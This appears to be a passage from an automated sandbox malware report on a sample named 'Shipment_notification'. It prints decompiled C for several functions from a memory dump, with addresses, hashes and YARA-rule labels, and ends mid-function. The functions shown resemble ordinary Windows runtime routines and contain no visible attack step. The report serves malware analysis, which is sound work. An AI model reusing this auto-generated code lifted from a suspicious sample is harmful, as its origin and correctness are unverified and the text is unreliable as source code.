                                                                                0x01b14c94
                                                                                0x01b14c94
                                                                                0x01b14c98
                                                                                0x01b14c9c
                                                                                0x01b14ca3
                                                                                0x01b567f4
                                                                                0x01b567f4
                                                                                0x01b14cb5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b14cb5
                                                                                0x01b14c79
                                                                                0x01b14c7e
                                                                                0x01b14c89
                                                                                0x01b14c8b
                                                                                0x01b14c8f
                                                                                0x01b14c8f
                                                                                0x00000000
                                                                                0x01b14c89
                                                                                0x01b567c3
                                                                                0x00000000
                                                                                0x01b567c3
                                                                                0x01b567af
                                                                                0x01b14c73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2d6a4b4d8dd4d359e4ca786b22ea5f2dead91d517e8de8dfab89614e0dc2e35
                                                                                • Instruction ID: 88b4d57a053bba6591e85f7f3de97ddd653e43fca840353b16e133ed50dec139
                                                                                • Opcode Fuzzy Hash: a2d6a4b4d8dd4d359e4ca786b22ea5f2dead91d517e8de8dfab89614e0dc2e35
                                                                                • Instruction Fuzzy Hash: B741A235A002299BDF69DF68C940FEAB7B4EF45750F4100E9ED08AB245EB74DE84CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF8A0A Relevance: .1, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E01AF8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x1bdd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L01B2B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E01AFE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1ac1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01B11DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01B23C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01AF8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                0x01af8a0a
                                                                                0x01af8a1c
                                                                                0x01af8a23
                                                                                0x01af8a2e
                                                                                0x01af8a30
                                                                                0x01af8a36
                                                                                0x01af8a3c
                                                                                0x01af8a3e
                                                                                0x01af8a4a
                                                                                0x01af8a52
                                                                                0x01af8a9c
                                                                                0x01af8aae
                                                                                0x01af8a58
                                                                                0x01af8a5e
                                                                                0x01af8a6a
                                                                                0x01af8a6f
                                                                                0x01af8a75
                                                                                0x01af8a7d
                                                                                0x01af8a85
                                                                                0x01af8a86
                                                                                0x01af8a89
                                                                                0x01af8a93
                                                                                0x01af8a99
                                                                                0x01af8a9b
                                                                                0x00000000
                                                                                0x01af8aaf
                                                                                0x01af8abe
                                                                                0x01af8ac3
                                                                                0x01af8acb
                                                                                0x01af8ad7
                                                                                0x01af8ae0
                                                                                0x01af8af1
                                                                                0x00000000
                                                                                0x01af8af1
                                                                                0x01af8acd
                                                                                0x01af8ad5
                                                                                0x01af8afb
                                                                                0x01af8afd
                                                                                0x01af8aff
                                                                                0x01af8b07
                                                                                0x01af8b22
                                                                                0x01af8b24
                                                                                0x01af8b2a
                                                                                0x01af8b2e
                                                                                0x01af8b3f
                                                                                0x01af8b78
                                                                                0x01af8b41
                                                                                0x01af8b52
                                                                                0x01af8b54
                                                                                0x01af8b5c
                                                                                0x01af8b74
                                                                                0x01af8b74
                                                                                0x01af8b5c
                                                                                0x01af8b3f
                                                                                0x01af8b5e
                                                                                0x01af8b61
                                                                                0x01af8b64
                                                                                0x01af8b64
                                                                                0x01af8b6c
                                                                                0x01af8b6c
                                                                                0x01af8b11
                                                                                0x01b49cd5
                                                                                0x01b49cd5
                                                                                0x01af8b17
                                                                                0x01af8b1a
                                                                                0x01af8b1a
                                                                                0x00000000
                                                                                0x01af8ad5
                                                                                0x01af8a89

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 62a667daabd820c8b51b4451e103815693030d6719e1886be40af2878336add7
                                                                                • Instruction ID: f7c4d9be5a01e429cacd16ed136e6a44c9bcc53a30ad8afb30070ec9cefb8a20
                                                                                • Opcode Fuzzy Hash: 62a667daabd820c8b51b4451e103815693030d6719e1886be40af2878336add7
                                                                                • Instruction Fuzzy Hash: 6E4180B1A0022D9BDB24DF99CC88AA9B7F4FB54300F1141EDEA1997252EB749E84CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B669A6 Relevance: .1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E01B669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1bdd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01AF6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01B66BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01B29980() >= 0) {
							E01B02280(_t56, 0x1bd8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1bd8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1bd8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E01AEB6F0(0x1acc338, 0x1acc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01B29520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E01B295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E01AFFFB0(_t68, _t77, 0x1bd8778);
				}
				_pop(_t78);
				return L01B2B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                0x01b669b5
                                                                                0x01b669be
                                                                                0x01b669c3
                                                                                0x01b669c9
                                                                                0x01b669cc
                                                                                0x01b669d1
                                                                                0x01b669d3
                                                                                0x01b669de
                                                                                0x01b669e1
                                                                                0x01b669ea
                                                                                0x01b669f6
                                                                                0x01b669fe
                                                                                0x01b66a13
                                                                                0x01b66a14
                                                                                0x01b66a15
                                                                                0x01b66a16
                                                                                0x01b66a1e
                                                                                0x01b66a26
                                                                                0x01b66a31
                                                                                0x01b66a36
                                                                                0x01b66a37
                                                                                0x01b66a40
                                                                                0x01b66a49
                                                                                0x01b66a4a
                                                                                0x01b66a53
                                                                                0x01b66a59
                                                                                0x01b66a5d
                                                                                0x01b66a5e
                                                                                0x01b66a64
                                                                                0x01b66a67
                                                                                0x01b66a6a
                                                                                0x01b66a6d
                                                                                0x01b66a70
                                                                                0x01b66a77
                                                                                0x01b66a7d
                                                                                0x01b66a86
                                                                                0x01b66a89
                                                                                0x01b66a9c
                                                                                0x01b66a9f
                                                                                0x01b66aa2
                                                                                0x01b66aa5
                                                                                0x01b66aaf
                                                                                0x01b66ab1
                                                                                0x01b66ab8
                                                                                0x01b66ab9
                                                                                0x01b66abb
                                                                                0x01b66abe
                                                                                0x01b66ac5
                                                                                0x01b66ac5
                                                                                0x01b66aaf
                                                                                0x01b66a40
                                                                                0x01b66a26
                                                                                0x01b669fe
                                                                                0x01b66ace
                                                                                0x01b66ad0
                                                                                0x01b66ad3
                                                                                0x01b66ad8
                                                                                0x01b66adf
                                                                                0x01b66adf
                                                                                0x01b66ae8
                                                                                0x01b66aef
                                                                                0x01b66aef
                                                                                0x01b66af9
                                                                                0x01b66b06

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c3d58c956e50c2e9d8f96b717a44af4c5401ff982845995ba1943ee820a3a29
                                                                                • Instruction ID: 5ccf1d0e0b337b9f8e675d44ef643d5c2b25530eeb666784038ef91ad7c098c0
                                                                                • Opcode Fuzzy Hash: 0c3d58c956e50c2e9d8f96b717a44af4c5401ff982845995ba1943ee820a3a29
                                                                                • Instruction Fuzzy Hash: 72419271D01209AFDB28DFA9D940BFEBBF8FF58714F048169E918A3250EB749905CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE5210 Relevance: .1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E01AE5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E01AE52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E01B295D0();
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E01AFEB70(_t54, 0x1bd79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E01B295D0();
								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E01AFEB70(_t54, 0x1bd79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E01B2F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E01AFEB70(_t54, 0x1bd79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E01B295D0();
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                0x01ae5220
                                                                                0x01ae5224
                                                                                0x01b40d13
                                                                                0x01b40d16
                                                                                0x01b40d19
                                                                                0x01ae522a
                                                                                0x01ae522a
                                                                                0x01ae522d
                                                                                0x01ae522d
                                                                                0x01ae5231
                                                                                0x01ae5235
                                                                                0x01ae5239
                                                                                0x01b40d5c
                                                                                0x01b40d62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b40d6a
                                                                                0x01b40d7b
                                                                                0x01b40d7f
                                                                                0x01b40d81
                                                                                0x01b40d84
                                                                                0x01b40d95
                                                                                0x01b40d95
                                                                                0x01b40d6c
                                                                                0x01b40d71
                                                                                0x01b40d71
                                                                                0x01b40d9a
                                                                                0x00000000
                                                                                0x01ae524a
                                                                                0x01ae524a
                                                                                0x01ae5250
                                                                                0x01b40d24
                                                                                0x01b40d35
                                                                                0x01b40d39
                                                                                0x01b40d3b
                                                                                0x01b40d3e
                                                                                0x01b40d50
                                                                                0x01b40d50
                                                                                0x01b40d26
                                                                                0x01b40d2b
                                                                                0x01b40d2b
                                                                                0x00000000
                                                                                0x01b40d55
                                                                                0x01ae5256
                                                                                0x01ae525b
                                                                                0x01ae5265
                                                                                0x01b40da7
                                                                                0x01ae526b
                                                                                0x01ae526e
                                                                                0x01ae5272
                                                                                0x01b40db1
                                                                                0x01b40db4
                                                                                0x01b40dc5
                                                                                0x01b40dc5
                                                                                0x01ae5272
                                                                                0x01ae5278
                                                                                0x01ae527e
                                                                                0x01ae528a
                                                                                0x01ae528c
                                                                                0x01ae528d
                                                                                0x00000000
                                                                                0x01ae5280
                                                                                0x01ae5282
                                                                                0x01ae5288
                                                                                0x01ae529f
                                                                                0x01ae5292
                                                                                0x00000000
                                                                                0x01ae5292
                                                                                0x00000000
                                                                                0x01ae5288
                                                                                0x01ae527e

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0168095d79d83fe27279115592ce0facdc8e70cb29d74d237e849b7c4a30ef61
                                                                                • Instruction ID: 880b7a6233fc1b738657d8eff301bf43eb81ce3dfb76ea387e58cf3a9acaed2b
                                                                                • Opcode Fuzzy Hash: 0168095d79d83fe27279115592ce0facdc8e70cb29d74d237e849b7c4a30ef61
                                                                                • Instruction Fuzzy Hash: EB315B31641611EBC72EAF28C840FAA77B5FF10764F118659FA994B1A1DB30F804D6D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B23D43 Relevance: .1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B23D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01AF7B60(0, _t61, 0x1ac11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01AF7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01B04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                0x01b23d4c
                                                                                0x01b23d50
                                                                                0x01b23d55
                                                                                0x01b23d5e
                                                                                0x01b5e79a
                                                                                0x00000000
                                                                                0x01b5e79a
                                                                                0x01b23d68
                                                                                0x01b5e789
                                                                                0x01b23d9d
                                                                                0x01b23da3
                                                                                0x01b23daf
                                                                                0x01b23db5
                                                                                0x01b23dbc
                                                                                0x01b23dc4
                                                                                0x01b23dc9
                                                                                0x01b23dce
                                                                                0x01b5e7ae
                                                                                0x01b5e7ae
                                                                                0x01b23dde
                                                                                0x01b23de2
                                                                                0x01b23de7
                                                                                0x01b23e0d
                                                                                0x01b23e13
                                                                                0x01b23e16
                                                                                0x01b23e1e
                                                                                0x01b23e25
                                                                                0x01b23e28
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b23e2a
                                                                                0x01b23e2f
                                                                                0x01b23e37
                                                                                0x01b23e37
                                                                                0x00000000
                                                                                0x01b23e37
                                                                                0x01b23e31
                                                                                0x00000000
                                                                                0x01b23e31
                                                                                0x01b23e20
                                                                                0x01b23e20
                                                                                0x01b23e35
                                                                                0x00000000
                                                                                0x01b23de9
                                                                                0x01b23de9
                                                                                0x01b23de9
                                                                                0x01b23dee
                                                                                0x01b23dfd
                                                                                0x01b23dff
                                                                                0x01b23e02
                                                                                0x01b23e05
                                                                                0x01b23e05
                                                                                0x00000000
                                                                                0x01b23df0
                                                                                0x01b23de7
                                                                                0x01b5e78f
                                                                                0x01b5e794
                                                                                0x01b23d79
                                                                                0x01b23d84
                                                                                0x01b23d89
                                                                                0x01b23d8e
                                                                                0x00000000
                                                                                0x01b5e7a4
                                                                                0x01b23d96
                                                                                0x01b23d9a
                                                                                0x00000000
                                                                                0x01b23d9a
                                                                                0x00000000
                                                                                0x01b5e794
                                                                                0x01b23d6e
                                                                                0x01b23d73
                                                                                0x00000000
                                                                                0x01b5e7b5
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e6ee900793069b4fca48a8d6f876a1669f481930a8b4bd745a9adaced7642687
                                                                                • Instruction ID: a0fb2ca745d3f2097f923b4268bc6d4ccdfd802b867bd2d87d29d949d6c813b3
                                                                                • Opcode Fuzzy Hash: e6ee900793069b4fca48a8d6f876a1669f481930a8b4bd745a9adaced7642687
                                                                                • Instruction Fuzzy Hash: 7631BE31A04625DBD72D9F2DC841A7ABBF5FF49740B0581AEE949CB360E738D844C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0C182 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E01B0C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01B07D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01BB8D34(_v8, _t80);
					}
					E01B02280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E01AFFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01BB8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E01AFFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E01B2B180();
						if(_a4 != 0) {
							E01B02280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E01B0BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E01B0BB2D(_t16, _t15);
						E01B0B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E01AFFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E01AFFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E01AFFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                0x01b0c18d
                                                                                0x01b0c18f
                                                                                0x01b0c191
                                                                                0x01b0c19b
                                                                                0x01b0c1a0
                                                                                0x01b0c1d4
                                                                                0x01b0c1de
                                                                                0x01b52d6e
                                                                                0x01b0c1e4
                                                                                0x01b0c1e4
                                                                                0x01b0c1e4
                                                                                0x01b0c1ec
                                                                                0x01b52d7d
                                                                                0x01b52d7d
                                                                                0x01b0c1f3
                                                                                0x01b0c1ff
                                                                                0x01b52d88
                                                                                0x01b52d8d
                                                                                0x01b52d94
                                                                                0x01b52d94
                                                                                0x01b52d9f
                                                                                0x01b52da4
                                                                                0x01b52dab
                                                                                0x01b52db0
                                                                                0x01b52db2
                                                                                0x01b52db3
                                                                                0x01b52db4
                                                                                0x01b52dbc
                                                                                0x01b52dc3
                                                                                0x01b52dc3
                                                                                0x01b0c205
                                                                                0x01b0c205
                                                                                0x01b0c208
                                                                                0x01b0c20e
                                                                                0x01b0c211
                                                                                0x01b0c216
                                                                                0x01b0c219
                                                                                0x01b0c21f
                                                                                0x01b0c222
                                                                                0x01b0c22c
                                                                                0x01b0c234
                                                                                0x01b0c23a
                                                                                0x01b0c23f
                                                                                0x01b0c245
                                                                                0x01b0c24b
                                                                                0x01b0c251
                                                                                0x01b0c25a
                                                                                0x01b0c276
                                                                                0x01b0c27d
                                                                                0x01b0c27d
                                                                                0x01b0c25c
                                                                                0x01b0c25c
                                                                                0x00000000
                                                                                0x01b0c25e
                                                                                0x01b0c1a4
                                                                                0x01b0c1aa
                                                                                0x01b0c1b3
                                                                                0x01b0c265
                                                                                0x01b0c26c
                                                                                0x01b0c26c
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                • Instruction ID: 199db5749294ee3405c450f101cc9dd10227a2f8413d7ceb99c57340cde5b881
                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                • Instruction Fuzzy Hash: 0831F272A01547AEDB0EEBB5C980BE9FF54FF52204F1442DAD51C97381DB346A4ACBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B67016 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E01B67016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1bdd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
